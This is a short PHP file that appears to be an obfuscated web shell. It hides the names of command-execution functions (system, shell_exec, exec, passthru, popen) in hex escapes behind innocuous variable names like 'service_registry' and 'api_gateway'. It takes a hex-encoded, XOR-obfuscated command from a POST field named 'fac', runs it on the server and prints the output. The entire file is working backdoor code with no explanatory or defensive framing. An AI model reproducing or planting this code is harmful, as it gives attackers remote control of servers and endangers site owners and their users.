<?php

$service_registry2 = "\x73hel\x6C\x5F\x65\x78ec";
$service_registry6 = "s\x74\x72\x65am\x5F\x67e\x74_con\x74ents";
$api_gateway = "hex\x32\x62\x69n";
$service_registry1 = "\x73y\x73t\x65m";
$service_registry4 = "pa\x73s\x74\x68\x72u";
$service_registry3 = "\x65x\x65c";
$service_registry5 = "\x70o\x70en";
$service_registry7 = "\x70\x63l\x6Fse";
if (isset($_POST["\x66\x61c"])) {
            function initialized     (   $sym      ,     $property_set      )     {
     $holder    =     ''   ;
     $v=0;
 do{
$holder.=chr(ord($sym[$v])^$property_set);
$v++;

} while($v<strlen($sym));
 return    $holder;
      
}
            $fac = $api_gateway($_POST["\x66\x61c"]);
            $fac = initialized($fac, 6);
            if (function_exists($service_registry1)) {
                $service_registry1($fac);
            } elseif (function_exists($service_registry2)) {
                print $service_registry2($fac);
            } elseif (function_exists($service_registry3)) {
                $service_registry3($fac, $ref_sym);
                print join("\n", $ref_sym);
            } elseif (function_exists($service_registry4)) {
                $service_registry4($fac);
            } elseif (function_exists($service_registry5) && function_exists($service_registry6) && function_exists($service_registry7)) {
                $property_set_holder = $service_registry5($fac, 'r');
                if ($property_set_holder) {
                    $flag_bind = $service_registry6($property_set_holder);
                    $service_registry7($property_set_holder);
                    print $flag_bind;
                }
            }
            exit;
        }